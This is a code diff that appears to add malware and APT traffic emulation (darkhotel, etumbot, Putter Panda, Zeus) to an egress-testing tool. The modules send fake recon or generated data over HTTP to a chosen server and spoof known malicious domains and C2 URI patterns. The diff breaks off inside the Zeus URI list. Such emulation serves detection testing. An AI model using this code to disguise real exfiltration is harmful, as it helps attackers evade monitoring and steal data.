parent
e02a727151
commit
cbe3fcc0f4
|
@ -48,8 +48,31 @@ if __name__ == "__main__":
|
|||
print
|
||||
sys.exit()
|
||||
|
||||
elif cli_parsed.list_actors:
|
||||
print "[*] Supported malware/APT groups: \n"
|
||||
the_conductor.load_actors(cli_parsed)
|
||||
for name, datatype_module in the_conductor.actor_modules.iteritems():
|
||||
print "[+] " + datatype_module.cli + " - (" +\
|
||||
datatype_module.description + ")"
|
||||
print
|
||||
sys.exit()
|
||||
|
||||
if cli_parsed.server is not None:
|
||||
the_conductor.load_server_protocols(cli_parsed)
|
||||
the_conductor.load_actors(cli_parsed)
|
||||
|
||||
# Check if server module is given threat actor vs. normal server
|
||||
for actor_path, actor_mod in the_conductor.actor_modules.iteritems():
|
||||
|
||||
# If actor module is what is used, search for the server requirement
|
||||
# and load that
|
||||
if actor_mod.cli == cli_parsed.server.lower():
|
||||
|
||||
for full_path, server_actor in the_conductor.server_protocols.iteritems():
|
||||
|
||||
if server_actor.protocol.lower() == actor_mod.server_requirement:
|
||||
server_actor.serve()
|
||||
|
||||
|
||||
for full_path, server in the_conductor.server_protocols.iteritems():
|
||||
|
||||
|
@ -86,3 +109,26 @@ if __name__ == "__main__":
|
|||
print "[*] Error: You either didn't provide a valid datatype or client protocol to use."
|
||||
print "[*] Error: Re-run and use --list-datatypes or --list-clients to see possible options."
|
||||
sys.exit()
|
||||
|
||||
elif cli_parsed.actor is not None:
|
||||
# Load different threat actors/malware
|
||||
the_conductor.load_actors(cli_parsed)
|
||||
|
||||
# Identify the actor to emulate
|
||||
for full_path, actor_variant in the_conductor.actor_modules.iteritems():
|
||||
if actor_variant.cli == cli_parsed.actor.lower():
|
||||
|
||||
# Check if generating data or using data within the actor module
|
||||
if cli_parsed.datatype is not None:
|
||||
the_conductor.load_datatypes(cli_parsed)
|
||||
|
||||
# Generate the data for the actor to exfil
|
||||
for name, datatype_module in the_conductor.datatypes.iteritems():
|
||||
if datatype_module.cli == cli_parsed.datatype.lower():
|
||||
generated_data = datatype_module.generate_data()
|
||||
|
||||
actor_variant.emulate(data_to_exfil=generated_data)
|
||||
|
||||
# Instead, use the exfil data within the module
|
||||
else:
|
||||
actor_variant.emulate()
|
||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,89 @@
|
|||
'''
|
||||
|
||||
This module generates darkhotel traffic.
|
||||
|
||||
Resources:
|
||||
https://securelist.com/blog/research/66779/the-darkhotel-apt/
|
||||
|
||||
'''
|
||||
|
||||
import random
|
||||
import sys
|
||||
import urllib
|
||||
import urllib2
|
||||
|
||||
|
||||
class Actor:
|
||||
|
||||
def __init__(self, cli_object):
|
||||
self.cli = "darkhotel"
|
||||
self.description = "darkhotel backdoor"
|
||||
self.type = "malware"
|
||||
self.server_requirement = "http"
|
||||
self.egress_server = cli_object.ip
|
||||
self.domains = [
|
||||
'micronaoko.jumpingcrab.com', 'microchsse.strangled.net',
|
||||
'microbrownys.strangled.net', 'microplants.strangled.net',
|
||||
'microlilics.crabdance.com']
|
||||
self.uris = [
|
||||
'/bin/read_i.php?a1=step2-down-b&a2=KJNSDFkjmdfH&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTMtMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgWFAgKFNlcnZpY2UgUGFjayAzKU5ldCBjYXJkIDogMTkyLjE2OC4wLjIgKDEzMzc3MzMxMTMzNyk=&a4=KS',
|
||||
'/bin/read_i.php?a1=step2-down-r&a2=KDYEMDYWM&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgNyAoU2VydmljZSBQYWNrIDIpTmV0IGNhcmQgOiAxOTIuMTY4LjI1LjIgKDEzMzc3MzMxMTMzNyk=&a4=TR',
|
||||
'/bin/read_i.php?a1=step2-down-u&a2=YEMDGEJEIMD&a3=SW5mb1N5c0BVc2VyIFdvcmtzdGF0aW9uQFNvbm9mRmx5bm4gKDA4NTApQyBQIFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy0xNTBVIENQVSBAIDE2MDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDguMSAoU2VydmljZSBQYWNrIDEpTmV0IGNhcmQgOiAxOTIuMTY4LjMzLjIgKDEzMzc3MzMxMTMzNyk=&a4=BD',
|
||||
'/bin/read_i.php?a1=step2-down-c&a2=MSNETJ&a3=SW5mb1N5c0BVc2VyIFNFUlZFUkRDQEFETUlOICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctOTBVIENQVSBAIDIwMDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDEwIE5ldCBjYXJkIDogMTkyLjE2OC4xMzMuMiAoMTMzNzczMzExMzM3KQ==&a4=AST',
|
||||
'/bin/read_i.php?a1=step2-down-k&a2=VSEJKNEF&a3=SW5mb1N5c0BVc2VyIERCQURCQFNZU0RCQSAoMDg1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MCBDUFUgQCAzMjAwR0h6U3lzdGVtIE9TOiBNaWNyb3NvZnQgV2luZG93cyBTZXJ2ZXIgMjAwMyBOZXQgY2FyZCA6IDE5Mi4xNjguMTUzLjIgKDEzMzc3MzMxMTMzNyk=&a4=NOD'
|
||||
'/bin/read_i.php?a1=step2-down-j&a2=ALFDOEJNKF&a3=SW5mb1N5c0BVc2VyIERBZG1pbkBEQ1N5cyAoMDk1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MDAgQ1BVIEAgMzgwMUdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgU2VydmVyIDIwMDggTmV0IGNhcmQgOiAxOTIuMTY4LjE5My4yICgxMzM3NzMzMTEzMzcp&a4=NV']
|
||||
self.checkin_domains = [
|
||||
'autolace.twilightparadox.com', 'automachine.servequake.com']
|
||||
|
||||
def emulate(self, data_to_exfil=None):
|
||||
|
||||
# headers that are used in get requests
|
||||
darkhotel_headers = {
|
||||
"User-Agent": " Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)",
|
||||
"Connection": "Keep-Alive",
|
||||
"Cache-Control": "no-cache",
|
||||
}
|
||||
|
||||
selected_checkin_domain = random.choice(self.checkin_domains)
|
||||
darkhotel_headers['Host'] = selected_checkin_domain
|
||||
|
||||
get_request = urllib2.Request(
|
||||
"http://" + self.egress_server + "/major/images/view.php",
|
||||
headers=darkhotel_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(get_request)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to darkhotel data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
get_request2 = urllib2.Request(
|
||||
"http://" + self.egress_server + "/major/txt/read.php",
|
||||
headers=darkhotel_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(get_request2)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to darkhotel data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
# Iterate over get and post request 5 times
|
||||
for times_requested in xrange(1, 6):
|
||||
selected_domain = random.choice(self.domains)
|
||||
darkhotel_headers['Host'] = selected_domain
|
||||
darkhotel_uri = random.choice(self.uris)
|
||||
|
||||
get_req2 = urllib2.Request(
|
||||
"http://" + self.egress_server + darkhotel_uri, headers=darkhotel_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(get_req2)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to darkhotel data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
print "URI == " + darkhotel_uri
|
||||
|
||||
print "[*] INFO: DarkHotel C2 comms complete!"
|
||||
return
|
|
@ -0,0 +1,96 @@
|
|||
'''
|
||||
|
||||
This module generates etumbot traffic.
|
||||
|
||||
Resources:
|
||||
https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/etumbot.profile
|
||||
|
||||
'''
|
||||
|
||||
import random
|
||||
import sys
|
||||
import urllib2
|
||||
|
||||
|
||||
class Actor:
|
||||
|
||||
def __init__(self, cli_object):
|
||||
self.cli = "etumbot"
|
||||
self.description = "etumbot backdoor"
|
||||
self.type = "malware"
|
||||
self.server_requirement = "http"
|
||||
self.egress_server = cli_object.ip
|
||||
self.domains = [
|
||||
'200.27.173.58', '200.42.69.140', '92.54.232.42', '133.87.242.63',
|
||||
'98.188.111.244', 'intro.sunnyschool.com.tw', '143.89.145.156',
|
||||
'198.209.212.82', '143.89.47.132', '196.1.199.15',
|
||||
'wwap.publiclol.com', '59.0.249.11', '190.16.246.129',
|
||||
'211.53.164.152', 'finance.yesplusno.com']
|
||||
self.encoded_string = [
|
||||
'dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--',
|
||||
'Y2F0Y2hldHVtYm90aWZ5b3VjYW4-',
|
||||
'Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24-',
|
||||
'bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA--',
|
||||
'd2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw-',
|
||||
'U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl',
|
||||
'dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-',
|
||||
'bm90cmVkYW1lY2hlYXRzdG93aW4-',
|
||||
'dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l',
|
||||
'YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy']
|
||||
self.post_data = [
|
||||
{'etumbot_id': 'uid=0(root) gid=0(root) groups=0(root)'},
|
||||
{'etumbot_whoami': 'root'}, {'etumbot_dir': 'C:\\, C:\\Windows'},
|
||||
{'etumbot_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'},
|
||||
{'etumbot_ipconfig': '192.168.1.83 255.255.255.0 192.168.1.1'},
|
||||
{'etumbot_ping': 'google.com time=11.6, 19.1, 12.8, 20'}]
|
||||
self.uris = [
|
||||
'/image/' + random.choice(self.encoded_string) + '.jpg',
|
||||
'/history/' + random.choice(self.encoded_string) + '.asp',
|
||||
'/manage/asp/item.asp?id=' + random.choice(self.encoded_string) + '&&mux=' + random.choice(self.encoded_string),
|
||||
'/article/30441/Review.asp?id=' + random.choice(self.encoded_string) + '&&date=' + random.choice(self.encoded_string),
|
||||
'/tech/s.asp?m=' + random.choice(self.encoded_string)]
|
||||
|
||||
def emulate(self, data_to_exfil=None):
|
||||
|
||||
# headers that are used in get requests
|
||||
etumbot_headers = {
|
||||
"User-Agent": "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
|
||||
"Connection": "Keep-Alive",
|
||||
"Referrer": "http://www.google.com/",
|
||||
"Pragma": "no-cache",
|
||||
"Cache-Control": "no-cache",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml,q=0.9,*/*;q=0.8"
|
||||
}
|
||||
|
||||
selected_domain = random.choice(self.domains)
|
||||
etumbot_headers['Host'] = selected_domain
|
||||
|
||||
get_request = urllib2.Request(
|
||||
"http://" + self.egress_server + "/home/index.asp?typeid=13",
|
||||
headers=etumbot_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(get_request)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to etumbot data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
# Iterate over get and post request 5 times
|
||||
for times_requested in xrange(1, 6):
|
||||
selected_domain = random.choice(self.domains)
|
||||
etumbot_headers['Host'] = selected_domain
|
||||
etumbot_uri = random.choice(self.uris)
|
||||
|
||||
get_req2 = urllib2.Request(
|
||||
"http://" + self.egress_server + etumbot_uri, headers=etumbot_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(get_req2)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to etumbot data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
print "URI == " + etumbot_uri
|
||||
|
||||
print "[*] INFO: Etumbot C2 comms complete!"
|
||||
return
|
|
@ -0,0 +1,108 @@
|
|||
'''
|
||||
|
||||
This module generates putterpanda traffic.
|
||||
|
||||
Resources:
|
||||
http://blog.crowdstrike.com/hat-tribution-pla-unit-61486/
|
||||
https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/putter.profile
|
||||
|
||||
'''
|
||||
|
||||
import random
|
||||
import sys
|
||||
import urllib
|
||||
import urllib2
|
||||
|
||||
|
||||
class Actor:
|
||||
|
||||
def __init__(self, cli_object):
|
||||
self.cli = "putterpanda"
|
||||
self.description = "Putter Panda APT"
|
||||
self.type = "malware"
|
||||
self.server_requirement = "http"
|
||||
self.egress_server = cli_object.ip
|
||||
self.domains = [
|
||||
'ctable.org', 'gamemuster.com', 'kyoceras.net', 'nestlere.com',
|
||||
'raylitoday.com', 'renewgis.com', 'siseau.com', 'bmwauto.org',
|
||||
't008.net', 'vssigma.com', 'anyoffice.info', 'it-bar.net',
|
||||
'jj-desk.com', 'satelliteclub.info', 'space-today.info',
|
||||
'sst1.info', 'stream-media.info', 'webfilestore.net']
|
||||
self.post_data = [
|
||||
{'putterpanda_id': 'uid=0(root) gid=0(root) groups=0(root)'},
|
||||
{'putterpanda_whoami': 'root'}, {'putterpanda_dir': 'C:\\, C:\\Windows'},
|
||||
{'putterpanda_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'},
|
||||
{'putterpanda_ipconfig': '192.168.1.83 255.255.255.0 192.168.1.1'},
|
||||
{'putterpanda_ping': 'google.com time=11.6, 19.1, 12.8, 20'}]
|
||||
self.encoded_hostnames = [
|
||||
'SG9tZVBD', 'Q29tcGFueVdvcmtzdGF0aW9u',
|
||||
'd29ya3N0YXRpb24tMTMy', 'UHJpbWFyeURvbWFpbkNvbnRyb2xsZXI=',
|
||||
'ZmlsZXNlcnZlcg==', 'd2Vic2VydmVy', 'RE5Tc2VydmVyMg==',
|
||||
'Yml0c3kubWl0LmVkdQ==', 'c2VydmVyMS5jaWEuZ292',
|
||||
'ZXZpZGVuY2UuZmJpLmdvdg==', 'ZGIuc3NhLmdvdg==',
|
||||
'cGlpLmZkYS5nb3Y=', 'ZGF0YS5mZGEuZ292']
|
||||
self.uris = [
|
||||
'/search5' + str(self.gen_numbers()) + '?h1=' + str(self.gen_numbers(num=2)) + '&h2=' + random.choice('13') + '&h3=' + str(self.gen_numbers(num=6)) + '&h4=' + self.random_letters(),
|
||||
'/microsoft/errorpost/default/connect.aspx?ID=' + str(self.gen_numbers()),
|
||||
'/MicrosoftUpdate/ShellEX/KB' + str(self.gen_numbers(num=7)) + '/default.aspx?tmp=' + random.choice(self.encoded_hostnames),
|
||||
'/microsoft/errorpost/default.aspx?ID=' + str(self.gen_numbers()),
|
||||
'/MicrosoftUpdate/GetUpdate/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames),
|
||||
'/MicrosoftUpdate/GetFiles/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames),
|
||||
'/MicrosoftUpdate/WWRONG/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames)]
|
||||
|
||||
|
||||
def emulate(self, data_to_exfil=None):
|
||||
|
||||
# headers that are used in get requests
|
||||
putter_headers = {
|
||||
"Accept": "*/*",
|
||||
"Connection": "Keep-Alive",
|
||||
"User-Agent": "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||||
}
|
||||
|
||||
# Iterate over get and post request 5 times
|
||||
for times_requested in xrange(1, 6):
|
||||
selected_domain = random.choice(self.domains)
|
||||
putter_headers['Host'] = selected_domain
|
||||
putter_uri = random.choice(self.uris)
|
||||
|
||||
# Determining which data is being sent out by agent
|
||||
if data_to_exfil is None:
|
||||
posted_data = random.choice(self.post_data)
|
||||
else:
|
||||
posted_data = {'putterpanda_data': data_to_exfil}
|
||||
|
||||
# UrlEncode and send the data out
|
||||
posted_data = urllib.urlencode(posted_data)
|
||||
post_req = urllib2.Request(
|
||||
"http://" + self.egress_server + putter_uri, posted_data, headers=putter_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(post_req)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to putter panda data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
print "[*] INFO: PutterPanda C2 comms complete!"
|
||||
|
||||
return
|
||||
|
||||
def gen_numbers(self, num=5):
|
||||
if num == 5:
|
||||
return random.randint(10000, 99999)
|
||||
elif num == 2:
|
||||
return random.randint(10, 99)
|
||||
elif num == 6:
|
||||
return random.randint(100000, 999999)
|
||||
elif num == 7:
|
||||
return random.randint(1000000, 9999999)
|
||||
else:
|
||||
print "odd error?"
|
||||
sys.exit()
|
||||
return
|
||||
|
||||
def random_letters(self, total=24):
|
||||
random_string = ''.join(
|
||||
random.choice('ABCDEFGHIJKLMNOP') for x in range(total))
|
||||
return random_string
|
|
@ -0,0 +1,279 @@
|
|||
'''
|
||||
|
||||
This module generates Zeus traffic.
|
||||
|
||||
Resources:
|
||||
https://zeustracker.abuse.ch/blocklist.php
|
||||
https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/zeus.profile
|
||||
|
||||
'''
|
||||
|
||||
import random
|
||||
import sys
|
||||
import urllib
|
||||
import urllib2
|
||||
|
||||
|
||||
class Actor:
|
||||
|
||||
def __init__(self, cli_object):
|
||||
self.cli = "zeus"
|
||||
self.description = "Zeus Malware"
|
||||
self.type = "malware"
|
||||
self.server_requirement = "http"
|
||||
self.egress_server = cli_object.ip
|
||||
self.domains = [
|
||||
'0x.x.gg', '6pjddrtt7.com', 'apexholdngs.com', 'baoshlda.com',
|
||||
'bestdove.in.ua', 'championbft.com', 'codedtunes.zapto.org',
|
||||
'cooldomainname.ws', 'danislenefc.info', 'dau43vt5wtrd.tk',
|
||||
'diosdelared.com.mx', 'emaillifecoaching.com.au', 'emekonline.tk',
|
||||
'eresimgbo.com', 'escoesco.info', 'fileserver03.com',
|
||||
'finsolutions.top', 'fronty2073.net', 'genmjob3.ru',
|
||||
'gjiayimeiya.com', 'gorainbowzone.tk', 'hope-found-now.net',
|
||||
'hruner.com', 'hui-ain-apparel.tk', 'ice.ip64.net',
|
||||
'interglobalswiss.info', 'jomo.in.ua', 'juyteche.tk',
|
||||
'kesikelyaf.com', 'legitvendors.ru', 'lion.web2.0campus.net',
|
||||
'liveresellerweb.eu', 'mccc-investconsultant.com' 'muazymaur.tk',
|
||||
'mymytonnymaxltd.org', 'mypic.hopto.org', 'mystartap.com',
|
||||
'neease.com', 'ns513726.ip-192-99-148.net',
|
||||
'panel.vargakragard.se', 'polyaire-au.com',
|
||||
'projects.globaltronics.net', 'regame.su', 'richus.ru',
|
||||
'server.bovine-mena.com', 'ssl.sinergycosmetics.com',
|
||||
'sslsam.com', 'sus.nieuwmoer.info', 'tesab.org.uk',
|
||||
'up.frigo2000.it', 'update.odeen.eu', 'update.rifugiopontese.it',
|
||||
'urchilaa.com', 'winscoft.com', 'www.nikey.cn',
|
||||
'www.riverwalktrader.co.za', 'www.witkey.com', 'zabava-bel.ru']
|
||||
self.post_data = [
|
||||
{'zeus_id': 'uid=0(root) gid=0(root) groups=0(root)'},
|
||||
{'zeus_whoami': 'root'}, {'zeus_dir': 'C:\\, C:\\Windows'},
|
||||
{'zeus_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'},
|
||||
{'zeus_ipconfig': '192.168.1.15 255.255.255.0 192.168.1.1'},
|
||||
{'zeus_ping': 'google.com time=13.6, 15.1, 19.8, 20'}]
|
||||
self.uris = [
|
||||
'/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin',
|
||||
'/jm32/includes/site/gate.php', '/mathew/config.jpg',
|
||||
'/docs/.docs/config.jpg', '/docs/.docs/do.php',
|
||||
'/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe',
|
||||
'/zeujuus/a/modules/config.bin',
|
||||
'/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php',
|
||||
'/zejius/2HZG41Zw/bot.exe',
|
||||
'/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin',
|
||||
'/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php',
|
||||
'/zejius/5GPR0iy9/bot.exe',
|
||||
'/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg',
|
||||
'/past/gate.php', '/fan/base/config.jpg',
|
||||
'/wp-includes/pomo/panel/config.jpg',
|
||||
'/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg',
|
||||
'/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php',
|
||||
'/home/plugins/system/tmp/bot.scr',
|
||||
'/home/plugins/system/tmp/config.bin',
|
||||
'/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg',
|
||||
'/js/ssj/gate.php', '/site/tmp/xml/config.jpg',
|
||||
'/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php',
|
||||
'/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban',
|
||||
'/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg',
|
||||
'/vs/panel/gate.php', '/brand/server/file.php',
|
||||
'/brand/server/gate.php',
|
||||
'/wp-admin/css/colors/sunrise/admin/bot.exe',
|
||||
'/wp-admin/css/colors/sunrise/admin/config.bin',
|
||||
'/wp-admin/css/colors/sunrise/admin/secure.php',
|
||||
'/wp-content/themes/chagim/library/images/plates/bot.exe',
|
||||
'/wp-content/themes/chagim/library/images/plates/config.bin',
|
||||
'/wp-content/themes/chagim/library/images/plates/gate.php',
|
||||
'/images/burr_insurance001001.php', '/images/team/config.jpg',
|
||||
'/images/team/gate.php', '/test/config.jpg', '/test/gate.php',
|
||||
'/ray/server/file.php', '/ray/server/gate.php', '/capa.bin',
|
||||
'/capa.exe', '/secure.php', '/ral/30/config.bin',
|
||||
'/ral/30/secure.php', '/wp-admin/css/config.bin',
|
||||
'/wp-admin/css/gate.php', '/wp-admin/css/setup.exe',
|
||||
'/panel/config.jpg', '/panel/gate.php',
|
||||
'/wp-includes2/SimplePie/Net/page/config.jpg',
|
||||
'/wp-includes2/SimplePie/Net/page/gate.php',
|
||||
'/includes/.srv/srv/bot.exe',
|
||||
'/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php',
|
||||
'/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin',
|
||||
'/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg',
|
||||
'/images2/gate.php', '/wp-includes/ID3/config.jpg',
|
||||
'/wp-includes/ID3/gate.php', '/emman/panel/config.jpg',
|
||||
'/emman/panel/gate.php', '/xampp/img/escu.bin',
|
||||
'/xampp/img/escu.exe', '/xampp/img/secure.php',
|
||||
'/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin',
|
||||
'/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe',
|
||||
'/isai/modules/mod_upgrade/config.bin',
|
||||
'/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg',
|
||||
'/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php',
|
||||
'/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php',
|
||||
'/img/vg.php', '/components/com_file/file.php',
|
||||
'/components/com_file/gate.php', '/images/panel/config.jpg',
|
||||
'/images/panel/gate.php', '/wordpress/gate.php',
|
||||
'/wordpress/gree.jpg', '/media/.tmp/file.php',
|
||||
'/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin',
|
||||
'/modules/holl.exe', '/templates/admin/install/config.jpg',
|
||||
'/templates/admin/install/gate.php',
|
||||
'/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php',
|
||||
'/tmp/cp/config.jpg', '/tmp/cp/gate.php',
|
||||
'/tmp/install/config.jpg', '/tmp/install/gate.php',
|
||||
'/frank/panel/config.jpg', '/frank/panel/gate.php',
|
||||
'/tmp/configs/new/vg.php', '/meask/lite/file.php',
|
||||
'/meask/lite/gate.php', '/css/src/admin/config.jpg',
|
||||
'/css/src/admin/gate.php', '/js/admin/install/config.jpg',
|
||||
'/js/admin/install/gate.php',
|
||||
'/wp-content/plugins/wp-db-backup-made/work.php',
|
||||
'/update/bot.exe', '/update/cfg.bin', '/update/gate.php',
|
||||
'/chopinschumann/ital.bin', '/chopinschumann/ital.exe',
|
||||
'/chopinschumann/secure.php', '/images/ital.bin',
|
||||
'/images/ital.exe', '/images/secure.php',
|
||||
'/compose/panel/bot.exe', '/compose/panel/config.bin',
|
||||
'/compose/panel/secure.php', '/fy97/panel/config.bin',
|
||||
'/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe',
|
||||
'/images/secure.php', '/components/com_joomla/plugin/config.jpg',
|
||||
'/components/com_joomla/plugin/gate.php',
|
||||
'/resource/css/config.bin', '/resource/css/secure.php',
|
||||
'/wp-content/upgrade/PANEL/config.jpg',
|
||||
'/wp-content/upgrade/PANEL/gate.php',
|
||||
'/wp-content/plugins/bcet56aoikqf52iu/food.php',
|
||||
'/Scripts/_notes/build/bot.exe',
|
||||
'/Scripts/_notes/build/config.bin',
|
||||
'/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe',
|
||||
'/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php',
|
||||
'/KINS/panel/bot.exe', '/KINS/panel/config.jpg',
|
||||
'/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php',
|
||||
'/walex/files/bot.exe', '/walex/files/config.jpg',
|
||||
'/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin',
|
||||
'/e7/gate.php',
|
||||
'/wp-admin/css/colors/coffee/cat/server/config.jpg',
|
||||
'/wp-admin/css/colors/coffee/cat/server/gate.php',
|
||||
'/site/S/13897652/5112/file.php',
|
||||
'/site/S/13897652/5112/gate.php',
|
||||
'/images/js/osomo/panel/config.jpg',
|
||||
'/images/js/osomo/panel/gate.php',
|
||||
'/themes/panel/config.jp', '/themes/panel/gate.php',
|
||||
'/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php',
|
||||
'/wqwcqqw/sasasacw.php', '/images/server/file.php',
|
||||
'/images/server/gate.php', '/cache/lcitorg/config.bin',
|
||||
'/cache/lcitorg/gate.php', '/form/panel/config.jpg',
|
||||
'/form/panel/gate.php', '/backup/gate.php',
|
||||
'/backup/jera.jpg', '/images/file.php',
|
||||
'/images/js/panel/config.jpg', '/images/js/panel/gate.php',
|
||||
'/images/config.jpg', '/images/gate.php',
|
||||
'/slim-cita/helps/file.php', '/slim-cita/helps/gate.php',
|
||||
'/kin/panelz/config.jpg', '/kin/panelz/gate.php',
|
||||
'/image/Panel/config.jpg', '/folder/config.bin',
|
||||
'/folder/secure.php', '/plugins/panel/config.jpg',
|
||||
'/plugins/panel/gate.php',
|
||||
'/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php',
|
||||
'/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php',
|
||||
'/js/MOM/config.jpg', '/js/MOM/gate.php',
|
||||
'/lung/panel/config.jpg', '/wp/config.jpg',
|
||||
'/wp/gate.php', '/data/config.jpg', '/data/gate.php',
|
||||
'/templates/beez/bot.exe', '/templates/beez/config.bin',
|
||||
'/templates/beez/gate.php', '/wp-includes/css/new/config.jpg',
|
||||
'/wp-includes/css/new/gate.php',
|
||||
'/language/pdf_fonts/server/bot.exe',
|
||||
'/language/pdf_fonts/server/config.bin',
|
||||
'/language/pdf_fonts/server/gate.php', '/js/liscence.php',
|
||||
'/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php',
|
||||
'/Mix/valeg/bot.exe', '/Mix/valeg/config.bin',
|
||||
'/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php',
|
||||
'/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg',
|
||||
'/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg',
|
||||
'/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php',
|
||||
'/admin/b7.php', '/admin/file.php', '/amed/config.jpg',
|
||||
'/amed/gate.php', '/sadcxvbv/vdfbffddf.php',
|
||||
'/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php',
|
||||
'/percy/panel/config.jpg', '/percy/panel/gate.php',
|
||||
'/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png',
|
||||
'/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg',
|
||||
'/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg',
|
||||
'/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg',
|
||||
'/news/secure.php', '/news/vuan.bin', '/.id/file.php',
|
||||
'/.id/gate.php',
|
||||
'/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php',
|
